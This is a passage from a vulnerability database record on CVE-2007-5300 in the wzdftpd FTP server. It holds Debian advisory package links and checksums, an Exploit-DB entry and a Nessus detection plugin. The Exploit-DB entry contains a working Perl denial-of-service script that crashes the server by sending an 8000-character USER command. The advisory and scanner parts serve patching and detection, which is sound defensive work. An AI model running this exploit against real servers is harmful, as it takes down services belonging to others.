http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_powerpc.deb\n Size/MD5 checksum: 288294 0e86e9d7ef432e12e5625737ed42a148\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_powerpc.deb\n Size/MD5 checksum: 48668 343a5388aecc0d6243aa52efa6feca49\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_powerpc.deb\n Size/MD5 checksum: 31860 3c962d7766f74ee131581ccd9764c386\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_powerpc.deb\n Size/MD5 checksum: 226588 ab00e6665c2341ec522b4db1a0e233d0\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_powerpc.deb\n Size/MD5 checksum: 29888 d45adf3b806c8fcd8f2aaaac81d0d0ee\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_s390.deb\n Size/MD5 checksum: 29824 9c82fae034d6d16db19ce33fbdb7c1bd\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_s390.deb\n Size/MD5 checksum: 217196 4a1c756f3c45218985bea2f9743dbc6f\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_s390.deb\n Size/MD5 checksum: 43930 6a6beb9127b537fe7b7148bf93d3d6d1\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_s390.deb\n Size/MD5 checksum: 31160 1dafc87562ed86f167e7b3ffbdafd960\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_s390.deb\n Size/MD5 checksum: 291876 660de49243389d08b3cb8e86d0398133\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_sparc.deb\n Size/MD5 checksum: 209916 b512248596cf3a7054df856421c7b734\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_sparc.deb\n Size/MD5 checksum: 273600 fba7f4ea9f353f2bdfad8da829814be3\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_sparc.deb\n Size/MD5 checksum: 45660 fc227e45bba942bbed4b3b4369c406da\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_sparc.deb\n Size/MD5 checksum: 29898 2bb5ab423dbb7852e78c4c56022f3816\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_sparc.deb\n Size/MD5 checksum: 29412 afa46a500de81f1b184ce39daeb8c021\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1.orig.tar.gz\n Size/MD5 checksum: 916176 adc0b6ec5b373d0ae9bcb79947dcdc34\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1.diff.gz\n Size/MD5 checksum: 12393 32c647651b80a26a3bb933c1abeb0c3b\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1.dsc\n Size/MD5 checksum: 863 68399e61898a27e00c5b79eb77c5eada\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 40494 1a24709abc401cfe37d726cded925447\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 36358 a432ae566f136f0b86065b4887076d31\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 40808 afa42a410b2fa5699d518b2d82f78f2a\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 31564 dcdba5a39c277a2417f467a46d359770\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 378302 1d5ae790c2e20c634401aa1188964399\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 303928 adb2c9b3f731a7af9275bf1b05c92f4f\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_alpha.deb\n Size/MD5 checksum: 54244 5f3ecb820e29c2f3a7d6596ee44ef766\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 39826 cbc6a520327457f192f3eded392afeb9\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 278392 5bf9cfaa598905ab383990ce9a2ddc39\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 39822 06dfab32ac91ded8d0463f86a3045783\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 52210 39f3285c116621c727cb035b3daf2146\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 279426 73d4840f06b1d3c1510b25cb2af0cd76\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 31128 bac87204e158dee6a887f11756f3bed5\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_amd64.deb\n Size/MD5 checksum: 35712 f65e8c48948c8bf07a7f931c0f5eab80\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 252038 884d79624db24c8a781d0aa0ea6c9262\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 34426 82f6f5b38fe51e00acef11bffdfefe61\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 38492 7f2ab5920dc9b95b8ad7ba864918ab59\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 252672 6b14994ae6595934737a5ee3509c31d8\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 30490 1c88463e827ccd1cb65b9b0712b2d3e1\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 50928 102aab74ff362fd9638ebcba9b674734\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_arm.deb\n Size/MD5 checksum: 38524 91a93c8950f3871ce60f8286d4426187\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 36966 53509f79ef24ba1bc60bef125a6de19e\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 31908 b07282752f3680e7eff678e16ead8957\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 54630 d5c3f56299b0a2d9c215e7e52e78635d\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 295266 cd40d190e0fcbdfd83d2f028f6ae643d\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 41212 efe9dd77f99cf70c461c0113967ed365\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 41300 234aa07522ce228c7182531f78385aa4\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_hppa.deb\n Size/MD5 checksum: 309492 cccbcf2ee08777e4bd6571e76587fdfd\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 255404 461bfb0f5ea1d4395662d759d6fc8e01\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 258984 4a9e2a8bb840497e49e067247beff4a6\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 51974 cfe147b51da8533a652593ac7095f906\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 39746 f4674503b34fc02517e3291718c25d78\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 35228 6d7b3d899bbae284744de1aba20dca40\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 31010 0a1c9f4eeee4aac5a6a319edc5ff5d41\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_i386.deb\n Size/MD5 checksum: 39382 1bf0337e5d353f7395c2e908ee66df43\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 39040 37a37ecb40c3dadc293056e0799e9d4f\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 61412 f17cfd857ccd2afa1c2d0b4fd4f767d5\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 44160 7e153fcb4680448dd571eb7cbaadd887\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 44968 43d60788c754002cc2b049cee9a441ec\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 362516 847cd633e2538ea41d839a47d650aa89\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 33134 8cf70d2c39636f901c8c48f94170615a\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_ia64.deb\n Size/MD5 checksum: 373030 d111155fd83c28e0ad88b11e3b2a41e2\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 39120 5b9de0d1c6632fb697b203dbb5ef23e1\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 47114 3a817ee42402f07e9125df0977ab4232\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 30896 a62a63fb1f869d7bec180f70ef883ba0\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 38760 6fb8399ae406dfe25c86a568702a2fad\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 306682 44ff34cc0e9ed4f434eaa2de5188671e\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 35092 b3659e67df4d397ded808540adcc1eab\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_mips.deb\n Size/MD5 checksum: 260088 7bb2ac3601c107563e83dde6afa77173\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 305494 b72940a7d1dcb61d07319abbb5a80a9c\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 38808 10c9266904fe911576fa64d4a8b62e62\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 35116 e1c1cb14203a5d39378f9fbaae601acd\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 260466 8530e7d26e983090d603101dd741573b\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 39088 50b370cc052b2f6225553055429ad9dd\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 47052 b525864b56e256d141b67bafb43ebe6f\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_mipsel.deb\n Size/MD5 checksum: 30876 c43bb383ef961cdd61f007324204c9a8\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 36800 01c52ecf901292169828f68fc79128b3\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 287198 a8d45cf4b6d94565cc23d158470c38bd\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 32596 a9a9f2c76e923e19812bbf2c74e94a2a\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 39748 63b0f8e69bdba8e8ff807eac51ef5178\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 53546 2a8014961fd5864364e74833a2056edc\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 278250 7b5e08e67cf971d43e3ef61be3519c75\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_powerpc.deb\n Size/MD5 checksum: 39786 c424e3d68756e982865edc4f0d3cb725\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 39666 0fa9273498d4b831b4f8b943f825d360\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 36014 bfae60cd99fed4a17fd9b2c49be6cb85\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 39534 3dfe1d78d520e789cb18792c52df5d2e\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 283726 b4398f379ff2680b89a64dfb79731d83\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 276306 47889561858e88b369d01f07f554f605\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 31422 b9eb5b0808e411404680668257986843\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_s390.deb\n Size/MD5 checksum: 49818 981f371cbe62f9e476da990cc2fe84d5\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 39044 95fd1adf43451c3bbd00820180a5b66e\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 34856 408a1e5737e95de2b63b95588b08133b\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 262888 13dd43e1ab04086306c5910996a47499\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 258762 47627fb1f6168d04b8cf97fd107782b9\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-pgsql_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 39090 e72f0b8f0cdf770ce6d7d64c2b37eca0\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-avahi_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 30762 0f8e9285c5c3f3d11529123d5fca6490\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.8.1-2etch1_sparc.deb\n Size/MD5 checksum: 50522 074fb8e8054184996c332d4e0d29f75d\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "modified": "2008-01-06T20:29:34", "published": "2008-01-06T20:29:34", "id": "DEBIAN:DSA-1452-1:052B0", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00010.html", "title": "[SECURITY] [DSA 1452-1] New wzdftpd packages fix denial of service", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T21:04:17", "bulletinFamily": "exploit", "description": "wzdftpd <= 0.8.0 (USER) Remote Denial of Service Exploit. CVE-2007-5300. Dos exploit for windows platform", "modified": "2007-10-07T00:00:00", "published": "2007-10-07T00:00:00", "id": "EDB-ID:4498", "href": "https://www.exploit-db.com/exploits/4498/", "type": "exploitdb", "title": "wzdftpd <= 0.8.0 USER Remote Denial of Service Exploit", "sourceData": "# Indonesian Newhack Security Advisory\n# ------------------------------------\n# wzdftpd <= 0.8.0 (USER) Remote Danial of Service\n# Waktu : Oct 07 2007 05:00AM\n# Software : wzdftpd 0.8.0\n# Version : 0.8.0 Linux and Windows\n# Vendor : http://www.wzdftpd.net/\n# Ditemukan oleh : k1tk4t | http://newhack.org\n# Lokasi : Indonesia\n#\n# Tested on Windows XP SP2 and Linux CentOS\n#\n# C0000005 (ACCESS VIOLATION)\n#\n# EAX 00000001\n# ECX 00A2F410\n# EDX 003E0608\n# EBX 00000000\n# ESP 00FDEB58\n# EBP 00FDFFEC\n# ESI 00A25118\n# EDI 00000094\n#\n#\n#\n# Terima Kasih untuk;\n# str0ke, DNX, xoron\n# -[opt1lc, fl3xu5, ghoz]-\n# nyubi,iFX,kin9k0ng,bius,selikoer,aldy_BT,NoGe\n# Komunitas Security dan Hacker Indonesia\n#\n#!/usr/bin/perl\nuse IO::Socket;\n\nprint \"\\n |-------------------------------------------------|\";\nprint \"\\n | Indonesian Newhack Technology |\";\nprint \"\\n |-------------------------------------------------|\";\nprint \"\\n | wzdftpd 0.8.0 (USER) Remote Danial of Service |\";\nprint \"\\n | Found by k1tk4t [k1tk4t(at)newhack.org] |\";\nprint \"\\n |-------------------------------------------------|\";\nprint \"\\n |\";\n\nif (@ARGV < 2)\n{\n print \"\\n[!] Penggunaan: perl wzdftpd0.8.0.pl [Host] [Port] \";\nprint \"\\n[!] Contoh: perl wzdftpd0.8.0.pl 127.0.0.1 21\";\n exit;\n}\n\n\n$ip = $ARGV[0];\n$port = $ARGV[1];\n\n$exploit = \"A\" x 8000;\n\n$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$ip\", PeerPort => \"$port\") || die \"\\n[-] Koneksi: Gagal!\\n\";\nprint \"\\n[+] Koneksi: Ok!\\n\";\nprint \"[+] Menggirim Packet DoS...\\n\";\n\nprint $socket \"USER $exploit\\n\";\nsleep(5);\nclose($socket);\n\nprint \"[?] Mati Sudah!\\n\";\n\n# milw0rm.com [2007-10-07]\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4498/"}], "nessus": [{"lastseen": "2020-08-01T01:17:27", "bulletinFamily": "scanner", "description": "'k1tk4t", "modified": "2020-08-02T00:00:00", "id": "DEBIAN_DSA-1452.NASL", "href": "https://www.tenable.com/plugins/nessus/29861", "published": "2008-01-07T00:00:00", "title": "Debian DSA-1452-1 : wzdftpd - denial of service", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1452. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(29861);\n script_version(\"1.17\");\n script_cvs_date(\"Date: 2019/08/02 13:32:21\");\n\n script_cve_id(\"CVE-2007-5300\");\n script_xref(name:\"DSA\", value:\"1452\");\n\n script_name(english:\"Debian DSA-1452-1 : wzdftpd - denial of service\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"'k1tk4t' discovered that wzdftpd, a portable, modular, small and\nefficient ftp server, did not correctly handle the receipt of long\nusernames. This could allow remote users to cause the daemon to exit.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=446192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2008/dsa-1452\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the wzdftpd package.\n\nFor the old stable distribution (sarge), this problem has been fixed\nin version 0.5.2-1.1sarge3.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 0.8.1-2etch1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_cwe_id(119, 189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:wzdftpd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:3.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/01/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/01/07\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"3.1\", prefix:\"wzdftpd\", reference:\"0.5.2-1.1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"wzdftpd-back-mysql\", reference:\"0.5.2-1.1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"wzdftpd-dev\", reference:\"0.5.2-1.1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"wzdftpd-mod-perl\", reference:\"0.5.2-1.1sarge3\")) flag++;\nif (deb_check(release:\"3.1\", prefix:\"wzdftpd-mod-tcl\", reference:\"0.5.2-1.1sarge3\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-back-mysql\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-back-pgsql\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-dev\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-mod-avahi\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-mod-perl\", reference:\"0.8.1-2etch1\")) flag++;\nif (deb_check(release:\"4.0\", prefix:\"wzdftpd-mod-tcl\", reference:\"0.8.1-2etch1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:deb_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}